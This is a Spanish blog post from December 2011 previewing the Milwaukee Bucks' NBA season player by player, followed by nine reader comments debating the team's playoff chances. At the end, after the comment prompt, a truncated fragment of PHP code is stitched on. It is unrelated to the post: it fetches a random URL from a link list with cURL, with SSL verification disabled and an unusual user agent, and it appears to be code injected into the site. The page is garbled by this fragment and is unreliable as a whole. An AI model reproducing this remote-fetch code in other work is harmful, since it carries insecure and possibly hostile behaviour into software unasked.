Milwaukee Bucks: Quiero ser un equipo “perro”

23 de December de 2011 por txusma

El año pasado los Bucks se quedaron fuera de los playoffs en buena parte por culpa de las lesiones. Mbah-a-Moute y Keyon Dooling fueron los únicos jugadores capaces de jugar más de 75 partidos. Andrew Bogut se quedó en 65 (además de jugar mermado toda la temporada), Brandon Jennings en 63, Ersan Ilysova en 60, Drew Gooden en 35… Jugadores claves que no pudieron ofrecer todo lo que se esperaba de ellos. Pero aparte de las lesiones el gran problema de Milwaukee fue que, a pesar de defender estupendamente (fueron el tercer equipo que menos punto recibió de sus rivales), no había manera de atacar con fluidez y anotar de manera regular. Los Bucks sólo fueron capaces de anotar 91’9 puntos por partidos, los peores de toda la NBA, casi un punto y medio por debajo del penúltimo peor equipo. John Salmons estuvo muy lejos del nivel mostrado la media temporada anterior (6 puntos menos por partido y un 5% menos de acierto en el tiro), el experimento Corey Maggette no funcionó, Andrew Bogut, como ya hemos dicho, jugó mermado (3 puntos menos por partido a pesar de jugar 3 minutos más) y Brandon Jennings no mejoró todo lo que se esperaba y se volvió a quedar por debajo del 40% de acierto en el tiro. Un auténtico desastre.

Pero la franquicia se puso pronto manos a la obra y la misma noche del draft incorporó a 2 jugadores que han de jugar un importante papel en el juego ofensivo, Stephen Jackson y Beno Udrih. La incorporación de Jackson es envenenada: su objetivo principal parece ser el de buscar una extensión de contrato y de no ver a los Bucks demasiado predispuestos podría decidir “dejar caer” su rendimiento perceptiblemente. Buena parte del rendimiento del equipo depende directamente del nivel de implicación de “Captain Jack” así que la patata caliente que se le presenta a Scott Skiles y la directiva de los Bucks no será fácil de resolver. Por su parte, el esloveno Beno Udrih viene a aportar aquello de lo que adolece Brandon Jennings: acierto. El ex de los Kings es uno de los mejores tiradores de 2 de todo el campeonato. Un agujero en defensa pero toda una amenaza en ataque. Su presencia en la cancha en lugar de Jennings cambiará seguramente la forma de jugar del equipo.

De todas maneras, Brandon Jennings seguirá siendo el base titular. Después de una temporada rookie muy prometedora (sobretodo en sus primeros meses), el año pasado no acabó de cumplir las expectativas y volvió a demostrar una falta de puntería alarmante, posiblemente obligado por las circunstancias visto el nulo acierto de sus compañeros de equipo. Con Stephen Jackson en el equipo y unos Andrew Bogut y Drew Gooden sanos, debería verse liberado de buena parte de esta responsabilidad. De todas maneras, debería comenzar a mejorar esta faceta de su juego si realmente quiere convertirse en alguien importante en esta liga. Como ya hemos comentado, Beno Udrih ha llegado justamente para complementar a Jennings. El sí es un jugador con un gran porcentaje de acierto tanto en el tiro como a la hora de penetrar y además pierde muy pocos balones. Su punto flaco es la defensa, así que le podremos ver más o menos minutos en función del partido que quiera plantear Skiles. En el traspaso de la noche del draft llegó también Shaun Livingstone, el que estaba llamado a ser el nuevo Magic Johnson y al que una terrible lesión de rodilla despertó del sueño para siempre. Ya no será el nuevo Magic Johnson pero los 76 partidos que jugó el año pasado demuestran que ha vuelto para quedarse y convertirse en una más que respetable base suplente. Posee una gran visión de juego y es un buen defensor a pesar de su altura (2’01 m.). No es un gran tirador pero su sola presencia condiciona mucho el juego rival: puede llevar al poste a cualquier otro base de la liga y hacerlo trizas.

La posición titular de escolta será para Stephen Jackson si es que se decide a jugar. De momento, no se ha estrenado por culpa de un dolor en la espalda. ¿Es real la lesión o ya está presionando en busca de la renovación? Veremos como afronta la temporada. De hacerlo de manera positiva, se trata de una amenaza ofensiva muy importante aunque los años le empiezan a pasar factura, sobretodo en defensa, donde ya no es el perro de presa que era antaño. Si Jackson no quiere jugar, los Bucks se van a encontrar con todo un problema. Mike Dunleavy es otra de las incorporaciones pero aunque ha jugado de escolta buena parte de los últimos años no tengo claro que esa sea su posición natural. Es un jugador muy inteligente, sobretodo en el juego sin balón pero particularmente horrible en la defensa uno contra uno. A priori no cuadra en el estilo de juego de Skiles por lo que su participación se ha de ver reducida a salir desde el banco y aportar frescura al ataque. ¿Quién nos queda entonces?

Podría ser Carlos Delfino pero apunta más a alero titular. La foto del argentino parece cuando buscas la palabra irregularidad en el diccionario. El año pasado alternó partidos memorables (26 puntos con un 7 de 10 en triples) con otros horribles (12 puntos con 0 de 6 en triples, 2 días después) y no parece que vaya a cambiar mucho en ese aspecto. Si es titular es por que Richard Mbah-a-Moute es practicamente nulo en el juego de ataque. Por el contrario es uno de los mejores defensores de la liga (sinó el mejor) capaz de defender a la estrella rival si esta juega de escolta, alero o ala-pívot. Scott Skiles está enamorado de él así que sus 25-30 minutos por partido los tendrá, como alero o ala-pívot. Si un verano aprendiera a tirar, no se sentaría muchos minutos en el banquillo. En el fondo del banco aparece Tobias Harris, rookie de primera ronda. Es un jugador muy joven que recuerda a Jared Dudley pero con más talento ofensivo. Ha de mejorar el tiro y ponerse en mejor forma pero en Milwaukee se confía en su evolución a largo plazo (ahora tiene 19 años).

El puesto de ala-pívot, si se mantiene sano, es para Drew Gooden. El que “discutiera” el puesto a Pau Gasol en los Grizzlies hace años ha evolucionado a jugador correcto, sin más. Ofensivamente es un buen jugador pero defensivamente no destaca. De nuevo, según como vaya el partido es probable que Skiles le siente para dar entrada a Mbah-a-Moute. Ersan Ilyasova saldrá desde el banco buscando, como mínimo mantener los números del año pasado, y acercarse a los de hace 2, cuando tan buena impresión causó en Milwaukee. Jon Leuer, el otro rookie de la plantilla, es el tercero en discordia. Vigilad a este hombre porque le auguro futuro en la liga. No será una estrella pero se asentará.

Y la posición de pívot es para, como no, Andrew Bogut. Defensivamente es uno de los mejores pívots de la liga y ofensivamente, una vez recuperado de su escalofriante lesión de 2010, ha de volver a ser el de aquella temporada, en la que jugó el All-Stars. Un dato: Bogut es el segundo pívot que menos puntos consigue gracias a asistencias de los compañeros. Esto quiere decir que el australiano está acostumbrado a buscarse las habichuelas por su cuenta y es muy capaz de encontrarlas. Por otro lado, habla muy mal de sus compañeros en particular de sus bases (Jennings…). Larry Sanders, jugador de segundo año, una bestia física, será el suplente. De nuevo nos encontramos a un jugador que defensivamente está por encima de la media (sobretodo en lo que a tapones se refiere) pero que en el otro lado de la cancha no destaca precisamente por su acierto y talento. De todas maneras, los Bucks vigilan de cerca su evolución. John “Intensidad y nada más” Brockman será el último hombre.

La idea es clara: defensa, defensa y un poco más de ataque que el año pasado, por favor. En este equipo todos pueden (y mucho saben) defender. Ahora falta que los jugadores que han de asumir las responsabilidades ofensivas lo hagan con acierto. Particularmente, tengo la sensación de que Jackson no va a dar todo lo que lleva dentro así que no puedo ser del todo optimista. Si el ex de los Bobcats se diciera a jugar a lo mejor me decantaría por una 8ª posición del Este pero… De entrar en playoffs serían el típico equipo (muy al estilo Grizzlies, salvando las distancias) con el que nadie se quiere enfrentar en primera ronda, un equipo “perro”. Muy de Skiles.

Quinteto: Brandon Jennings, Stephen Jackson, Carlos Delfino, Drew Gooden, Andrew Bogut
6º hombre: Richard Mbah-a-Moute

Pronóstico: Fuera de Playoffs por bien poco.

Comenta

9 comentarios a esta entrada

  1. melo15 dice:
    #1

    muy buen analisis txusma a mi personalmente me gustan mucho estos bucks aver que tal les va yo creo que si pueden ir a playoffs pero si entran sera muy justo

      Citar

  2. GreenPride dice:
    #2

    Creo que son un equipo muy correoso pero que les falta algo para romper. Muchos jugadores especialilstas como se ve en el gran análisis de Txusma. Muy buenos defensores o buenos jugadores de ataque pero pocos jugadores realmente completos a ambos lados de la cancha. Tienen potencial pero yo creo que quedarán fuera de los PO por poco. El día que defiendan como saben será complicado meterles puntos y protagonizarán algún que otro toston-ball a 80 puntos. No son uno de los equipos que me llamen la atención para verlos la verdad

      Citar

  3. Sancho88 dice:
    #3

    Enorme análisis, Txus. No puedo estar más de acuerdo en lo que dices. Está claro, como dice Green, que van a protagonizar tostones como siempre, y que un duelo contra los Bobcats difícilmente pase de los 150 puntos. Son equipos que aburren, que podrían estar perfectamente en postemporada si se decidieran a abandonar un poco la concepción ultradefensiva y a confiar en su talento, que lo tienen. Has nombrado a Stephen Jackson en el análisis como un jugador que puede borrarse. Está claro que en los Bobcats sentó un poco la cabeza después de sus calamitosas aventuras en Indiana. En todo caso, dependerá exclusivamente de él. Es un jugador que tiene los 25 puntos por partido en sus manos, y si quiere los meterá y si no quiere no los meterá. Sobre Udrih, es el complemento perfecto a un base con cualidades de dirección, en este caso Jennings. Su manita es devastadora, pero su defensa inexistenet. No obstante, como base recambio, veo pocos en la liga a su nivel. Y Deflino tres cuartos de lo mismo que Jackson. Me sorprende que no nombres en el análisis a Ilyasova. La temporada pasada se la pasó por los reales, pero hace dos fue la clave para asustar a los Hawks, y es otro jugador que si se entona puede dar grandes noches a Milwaukee. Y sobre Bogut no hay nada que decir, en estos momentos uno de los cinco mejores centers de la competición, y defensivamente el mejor. Yo pienso que equipo perro como dices si van a ser, y equipo playoff… dependerá de si se implican o no

      Citar

  4. Txusma dice:
    #4

    Sí que nombro a Ilyasova, lo q pasa es que se me olvió poner las negritas correspondientes. Lo voy a arreglar 😉

      Citar

  5. melo15 dice:
    #5

    En el 2k12 lo ponen fatal a bogut (esque me lo acabo de comprar)

      Citar

  6. LEmontus dice:
    #6

    ¿¿Donde y cuando ha hablado Bogut muy mal de sus compañeros en particular de sus bases (Jennings…)??

    De acuerdo con tigo en la proyección de Jonh Leuer que parece que va aser importante en un futuro, en el dudoso rendimiento de Jackson y en que Mbah Moute es muy flojo en ataque pero el mejor defensor de la liga.

    Si analizas a Bucks no puedes nombrar a Jennings como si fuera el peor del equipo porque es el más importante el que crea espeacios y al que os equipos rivales se encargan de curbrir, si es cierto que tiene partidos que sus porcentajes no son propios de un jugador franquicia pero de ahí a practicamente ponerlo como el fallo del equipo…

    Yo creo que si Jennings está bien iran a Po seguro.

      Citar

  7. German dice:
    #7

    Se refiere a que el hecho de que se consiga sus puntos solo da a entender que los bases no le ayudan demasiado con asistencias, no es que Bogut los haya criticado.

      Citar

  8. Tobal dice:
    #8

    No tienen mal equipo,estos Bucks,pero no les veo en playoffs para nada,el juego interior es muy pobre,aunque tengan a Bogut,además de que el Este,esta temporada será más competido.

      Citar

  9. Esteban dice:
    #9

    los bucks son una cosa parecida a altanta pero de un escalon y medio mas abajo, a ver, un buen grupo, muy buenos para romperlos de un dia para otro, pero no lo suficiente para dar un salto, los hawks para alcanzar las finales de conferencia y los bucks para pasar a segunda ronda, por q vamos que son un equipo de PO, con bogut, jackson y jennings años anteriores les deberia alcanzar para pelear el 5to del este, como dije, la vara se ha elevado y dudo que puedan entrar

    creo en primer lugar que jennings, es un buen jugador, pero no es el base titular de un equipo, funcionaria bien como revulsivo saltando desde el banco

    desp tienen un gran manojo de jugadores, correctos como todos señalan y no mucho mas

    si jackson puede ser algo de lo que añlguna vez fue y ser la estrella del equipo y tomar las riendas del ataque con unos 20pp para un nuevo contrato, son altamente temibles, si esto no es asi y se deja estar, no entrar a PO

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>